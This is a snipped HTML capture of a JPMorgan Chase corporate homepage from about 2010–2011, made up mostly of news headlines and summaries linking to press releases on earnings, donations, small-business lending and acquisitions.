<p><iframe src="https://fls.doubleclick.net/activityi;src=2545591;type=corpo299;cat=jpm-h763;ord=1;num=3250008671477.627?" frameborder="0" width="0" height="0" style="width: 0px; height: 0px"></iframe><noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=2545591;type=corpo299;cat=jpm-h763;ord=1;num=1?" frameborder="0" width="0" height="0" style="width: 0; height: 0;">
</iframe>
...[SNIP]...
<map name="Map"><area alt="4Q 2010 earnings. JPMorgan Chase &amp; Co announces fourth quarter earnings" href="https://investor.shareholder.com/jpmorganchase/earnings.cfm" coords="829,78,992,187" shape="rect" /><area alt="Small Business Chase committed ten billion dollars to small businesses this year. Watch video." href="/corporate/Home/home.htm?flv_movie_name=142375_biz_550x310.mp4" coords="217,259,314,285"
...[SNIP]...
</div><object id="twf_main_header" width="1005" height="239" align="middle" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"><param name="_cx" value="26591" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=546198">Chase Donates $25 Million to Support U.S. Small Businesses</a>
...[SNIP]...
>Chase announced today $25 million in grants to Community Development Financial Institutions (CDFIs) serving hard-to-reach communities, creating jobs and doubling the capital in these communities..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=546198">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=546198"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=545441">JPMorgan Chase Holds Investor Day</a>
...[SNIP]...
<div class="news_description">JPMorgan Chase will hold an Investor Day in New York City on Tuesday, February 15. Jamie Dimon and other executives will give presentations..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=545441">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=545441"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://files.shareholder.com/downloads/ONE/1128829354x0x435201/6956230c-d81a-4eae-ba15-bfa67c42bccb/4Q10_JPMorgan_EPR_FINAL.pdf">JPMorgan Chase Reports Fourth-Quarter & Full-Year 2010 Earnings</a>
...[SNIP]...
<div class="news_description">JPMorgan Chase reports fourth-quarter 2010 net income of $4.8 billion, up 47% from prior year, and full-year 2010 net income of $17.4 billion, up 48% over prior year....<a class="more" target="_blank" href="http://files.shareholder.com/downloads/ONE/1128829354x0x435201/6956230c-d81a-4eae-ba15-bfa67c42bccb/4Q10_JPMorgan_EPR_FINAL.pdf">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://files.shareholder.com/downloads/ONE/1128829354x0x435201/6956230c-d81a-4eae-ba15-bfa67c42bccb/4Q10_JPMorgan_EPR_FINAL.pdf"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=538043">J.P. Morgan Acquires New European Investment Bank Headquarters in London</a>
...[SNIP]...
ate investments in London, including the acquisitions of 25 Bank Street in Canary Wharf, which will become the new European headquarters of its Investment Bank in 2012, and 60 Victoria Embankment..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=538043">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=538043"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=538207">Chase Provided More Than $10 Billion of Credit to 250,000 Small Businesses</a>
...[SNIP]...
<div class="news_description">Chase announced today that it has exceeded its goal of providing $10 billion of credit to more than 250,000 American small businesses in 2010...... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=538207">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=538207"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=536162">JPMorgan Chase Announces Conference Call to Review 4Q 2010 Earnings</a>
...[SNIP]...
an Chase will host a conference call to review 4Q10 financial results on January 14, 2011 at 9:00 a.m. (Eastern). Results are currently scheduled to be released at 7:00 a.m. on January 14, 2011....... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=536162">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=536162"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=527979">JPMorgan Chase to Present at the Bank of America Merrill Lynch Conference</a>
...[SNIP]...
ill present at the Bank of America Merrill Lynch Banking and Financial Services Conference at the Westin Times Square Hotel in New York, NY on Wednesday, November 17, 2010 at 8:00 AM Eastern Time..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=527979">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=527979"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=533429">Impact Investing Emerges as a Distinct Asset Class</a>
...[SNIP]...
J.P. Morgan and the Rockefeller Foundation finds impact investment to be a new asset class. Impact investment is intended to create positive social or environmental impact beyond financial return..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=533429">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=533429"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=530441">Chase Doubles SBA Loans to Become #1 in U.S., Helps 3,300 Businesses</a>
...[SNIP]...
that it increased its Small Business Administration loan volume by 170% in fiscal 2010 to become the nation&rsquo;s largest SBA lender, helping 250 more businesses than the next largest lender....... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=530441">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=530441"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=530383">J.P. Morgan Launches iPad Research App</a>
...[SNIP]...
<div class="news_description">J.P. Morgan today unveiled a new iPad app, giving clients instant access to the Investment Bank&rsquo;s award-winning research from the convenience of their iPad...... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=530383">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=530383"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=526688">J.P. Morgan is Top-Rated in Private Equity Fund Administration Survey </a>
...[SNIP]...
ked J.P. Morgan as a top provider of private equity fund administration for the fourth consecutive year. J.P. Morgan has earned more &quot;best in class&quot; ratings than any other administrator..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=526688">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=526688"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://files.shareholder.com/downloads/ONE/854362774x0x409163/14a3f375-5913-4c58-a4ce-3eb855569bf2/3Q10_Earnings_Press_Release.pdf">JPMorgan Chase Announces Third Quarter 2010 Earnings</a>
...[SNIP]...
<div class="news_description">JPMorgan Chase reports third-quarter 2010 net income of $ 4.4 billion, or $1.01 per share, on revenue of $ 24.3 billion.... <a class="more" target="_blank" href="http://files.shareholder.com/downloads/ONE/854362774x0x409163/14a3f375-5913-4c58-a4ce-3eb855569bf2/3Q10_Earnings_Press_Release.pdf">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://files.shareholder.com/downloads/ONE/854362774x0x409163/14a3f375-5913-4c58-a4ce-3eb855569bf2/3Q10_Earnings_Press_Release.pdf"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=515878">Chase Community Giving Advisory Board Announces More Grants</a>
...[SNIP]...
<div class="news_description">Chase Community Giving Advisory Board names 17 additional charities to receive more than $500,000 in grants...... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=515878">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=515878"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=525566">NBA All-Star Chris Paul and Chase Donate $1 Million To Afterschool Partnership</a>
...[SNIP]...
ty will soon be able to enjoy a wide variety of safe, enriching afterschool programs thanks to a groundbreaking partnership between one of the city's premier athletes and one of its largest banks..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=525566">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=525566"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=514154">Chase Agrees to Offer Mortgage Aid to Unemployed Chase Borrowers in Michigan</a>
...[SNIP]...
rs who live in the state and are receiving Michigan unemployment benefits. The program may pay up to half of qualified borrowers' monthly mortgage for up to 12 months on their primary residence. ..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=514154">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=514154"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=502285">Chase&rsquo;s Mortgage Modification Offers Exceed 900,000</a>
...[SNIP]...
it has offered more than 900,000 mortgage modifications to struggling homeowners since the beginning of 2009 through a wide range of government and Chase initiatives to address the housing crisis..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=502285">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=502285"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=508546">JPMorgan Chase Announces Conference Call to Review 3Q 2010 Earnings</a>
...[SNIP]...
to review third quarter 2010 financial results on October 13, 2010 at 9:00 a.m. (Eastern). Third quarter financial results are currently scheduled to be released at 7:00 a.m. on October 13, 2010..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=508546">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=508546"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=507291">JPMorgan Chase to Present at the Barclays Conference</a>
...[SNIP]...
gan Chase &amp; Co., will present at the Barclays Global Financial Services Conference at the Sheraton New York Hotel and Towers in New York City on Tuesday, September 14, 2010 at 1:05 p.m. (EDT)..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=507291">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=507291"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=498049">Chase Purchases $3.5 Billion of Performing Real Estate Loans from Citibank</a>
...[SNIP]...
<div class="news_description">JPMorgan Chase announced today that it has purchased a $3.5 billion portfolio of multifamily and commercial real estate loans from Citibank..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=498049">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=498049"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://www.jpmorgan.com/cm/cs?pagename=JPM_redesign/JPM_Content_C/Generic_Detail_Page_Template&cid=1280728963708&c=JPM_Content_C">Daniel Zelikow to head new International Public Sector Group</a>
...[SNIP]...
ay announced that Inter-American Development Bank Executive Vice President and Chief Operating Officer Daniel Zelikow will be rejoining the firm as head of a new International Public Sector Group..... <a class="more" target="_blank" href="http://www.jpmorgan.com/cm/cs?pagename=JPM_redesign/JPM_Content_C/Generic_Detail_Page_Template&cid=1280728963708&c=JPM_Content_C">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://www.jpmorgan.com/cm/cs?pagename=JPM_redesign/JPM_Content_C/Generic_Detail_Page_Template&cid=1280728963708&c=JPM_Content_C"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=488345">JPMorgan Chase Announces Second Quarter 2010 Earnings</a>
...[SNIP]...
<div class="news_description">JPMorgan Chase Reports Second-Quarter 2010 Net Income of $4.8 Billion, or $1.09 Per Share, on Revenue of $25.6 Billion.... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=488345">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=488345"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=487739">Chase Community Giving Announces Winning Charities for Summer 2010 Program</a>
...[SNIP]...
="news_description">Second successful program attracts more than 2.5M Facebook users. Harry Potter Alliance to receive $250,000; four runners-up to receive $100,000; 195 others to receive $20,000..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=487739">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=487739"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=484514">J.P. Morgan Completes Acquisition from RBS Sempra</a>
...[SNIP]...
<div class="news_description">J.P. Morgan announced today the completion of its acquisition of RBS Sempra Commodities' assets as originally announced on February 16, 2010..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=484514">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=484514"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=483977">Hire a New Employee? Chase Will Lower Your Interest Rate</a>
...[SNIP]...
<div class="news_description">Continuing its commitment to small businesses, Chase announced today an innovative incentive that rewards businesses for each new employee they hire this year....... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=483977">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=483977"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=481574">JPMorgan Chase Announces New Responsibilities for Three Senior Executives</a>
...[SNIP]...
<div class="news_description">Heidi Miller named President of International; Michael Cavanagh appointed CEO of Treasury &amp; Securities Services; Doug Braunstein named Chief Financial Officer..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=481574">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=481574"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_self" href="http://cms-images-online.jpmchase.net/corporate/Corporate-Responsibility/rebuild-amusement-park.htm">New York&rsquo;s Largest Bank Helps Rebuild NY&rsquo;s Oldest Amusement Park</a>
...[SNIP]...
>Chase announced that it in helping to preserve New York&rsquo;s oldest amusement park, it provided $3.5 million loan to help purchase&nbsp;seven rides for Coney Island&rsquo;s new Luna Park.......... <a class="more" target="_self" href="http://cms-images-online.jpmchase.net/corporate/Corporate-Responsibility/rebuild-amusement-park.htm">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_self" href="http://cms-images-online.jpmchase.net/corporate/Corporate-Responsibility/rebuild-amusement-park.htm"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://files.shareholder.com/downloads/ONE/891787790x0x373671/ba14d3b5-9407-42f9-aa1a-406826139531/JPM_News_2010_5_12_Current.pdf">Chase Unveils New Card Services to Help Mid-Size Companies</a>
...[SNIP]...
commercial card payment solutions and capabilities to its sizable mid-market corporate client base as part of its continued effort to enhance the power and scope of its commercial card offering...... <a class="more" target="_blank" href="http://files.shareholder.com/downloads/ONE/891787790x0x373671/ba14d3b5-9407-42f9-aa1a-406826139531/JPM_News_2010_5_12_Current.pdf">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://files.shareholder.com/downloads/ONE/891787790x0x373671/ba14d3b5-9407-42f9-aa1a-406826139531/JPM_News_2010_5_12_Current.pdf"><img title="pdf" alt="pdf" src="/corporate/includes/images/pdf.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=466812">Chase Plans Multi-Day, Foreclosure-Prevention Events</a>
...[SNIP]...
sively for struggling Chase homeowners in eight major US markets this year, building on the success of one-on-one help for 3,200 customers in FL and complementing 51 Chase Homeownership Center........ <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=466812">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=466812"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=466384">JPMorgan Chase Creates $325M Funding Initiative for High-Performing Charter Schools</a>
...[SNIP]...
class="news_description">JPMorgan Chase announced today a $325 Million initiative to support the growth of high-performing U.S. Charter Schools in today&rsquo;s challenging credit environment......... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=466384">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=466384"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=458901">JPMorgan Chase Issues First Quarter 2010 Earnings</a>
...[SNIP]...
<div class="news_description">JPMorgan Chase &amp; Co. reports first-quarter 2010 net income of $3.3 billion, compared with net income of $2.1 million in the first quarter of 2009...... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=458901">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=458901"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=453682" pcg="" id="lnk_lienProgram">Chase Joins Second-Lien Program to Keep More Families in Homes</a>
...[SNIP]...
ws_description">Chase announced today that it will provide additional help to struggling homeowners by joining the government's program to lower payments on homeowners' first and second mortgages..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=453682" pcg="" id="lnk_lienProgram">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=453682" pcg="" id="lnk_lienProgram"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=444950" pcg="" id="lnk_jpmc_rbs">J.P. Morgan to Acquire Select Assets of RBS Sempra Commodities</a>
...[SNIP]...
<div class="news_description">J.P. Morgan announced today that it will acquire RBS Sempra Commodities' global oil, global metals and European power and gas assets..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=444950" pcg="" id="lnk_jpmc_rbs">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=444950" pcg="" id="lnk_jpmc_rbs"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=441911" pcg="" id="lnk_chase_donation">Chase donation to The Woodall Rodgers Park Foundation in Dallas </a>
...[SNIP]...
he Woodall Rodgers Park Foundation in Dallas announced a $3 million donation from Chase, the lead donor in the final phase of the campaign to build the keystone public park to revitalize the city..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=441911" pcg="" id="lnk_chase_donation">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=441911" pcg="" id="lnk_chase_donation"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<DIV class=news_title><A class=nhd_link href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=439999" target=_blank pcg="" id="lnk_facebook">Chase and Facebook announced final list of charities</A>
...[SNIP]...
ws_description>Chase and Facebook announced today the final list of small and local charities that will receive a total of more than $5 million in grants from Chase through Chase Community Giving..... <A class=more href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=439999" pcg="" id="lnk_facebook" target=_blank>More</A>
...[SNIP]...
<DIV class=news_type><A class=more href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=439999" pcg="" id="lnk_facebook" target=_blank><IMG title=article alt=article src="/corporate/includes/images/article.gif">
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=437742" pcg="" id="lnk_jpmc_haiti">JPMorgan Chase Reaches Out to Aid Victims of Haitian Earthquake</a>
...[SNIP]...
class="news_description">Following a devastating earthquake in Haiti that resulted in yet untold casualties and severe infrastructure damage, the bank commited $1 million for rescue and recovery..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=437742" pcg="" id="lnk_jpmc_haiti">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=437742" pcg="" id="lnk_jpmc_haiti"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=437415" pcg="" id="lnk_testimony_finCri">JPMorgan Chase Testimony before the Financial Crisis Inquiry Commission</a>
...[SNIP]...
and CEO Jamie Dimon testified in Washington, DC on the causes of the financial crisis and the bank's focus on risk management, responsible lending and disciplined capital and liquidity management..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=437415" pcg="" id="lnk_testimony_finCri">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=437415" pcg="" id="lnk_testimony_finCri"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=431501" pcg="" id="lnk_chase_donates">Chase donates $2.25M for security cameras at schools</a>
...[SNIP]...
<div class="news_description">Chicago Public Schools Officials Accept Donation of Security Cameras for 40 High Schools from Chase...... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=431501" pcg="" id="lnk_chase_donates">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=431501" pcg="" id="lnk_chase_donates"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/JPMorganChase/press/releasedetail.cfm?ReleaseID=430809">Chase and Facebook Announce Charities to Receive $25,000</a>
...[SNIP]...
local charities that each will receive a $25,000 grant from Chase and now have a chance to receive a Million Dollar Grant, following Facebook users' voting in Round One of Chase Community Giving..... <a class="more" target="_blank" href="http://investor.shareholder.com/JPMorganChase/press/releasedetail.cfm?ReleaseID=430809">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/JPMorganChase/press/releasedetail.cfm?ReleaseID=430809"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=429408" pcg="" id="lnk_feedAmerica">Feeding America</a>
...[SNIP]...
>At a time when more and more Americans rely on local food banks for assistance, Feeding America, the nation's largest hunger-relief organization, received a $5 million donation from Chase today. .... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=429408" pcg="" id="lnk_feedAmerica">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=429408" pcg="" id="lnk_feedAmerica"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=428900" pcg="" id="lnk_JPMCStock">JPMorgan Chase declares common stock and preferred stock dividend</a>
...[SNIP]...
f 5 cents per share on the outstanding shares of the Corporation's common stock. The dividend is payable on January 31, 2010, to stockholders of record at the close of business on January 6, 2010..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=428900" pcg="" id="lnk_JPMCStock">More</a>
...[SNIP]...
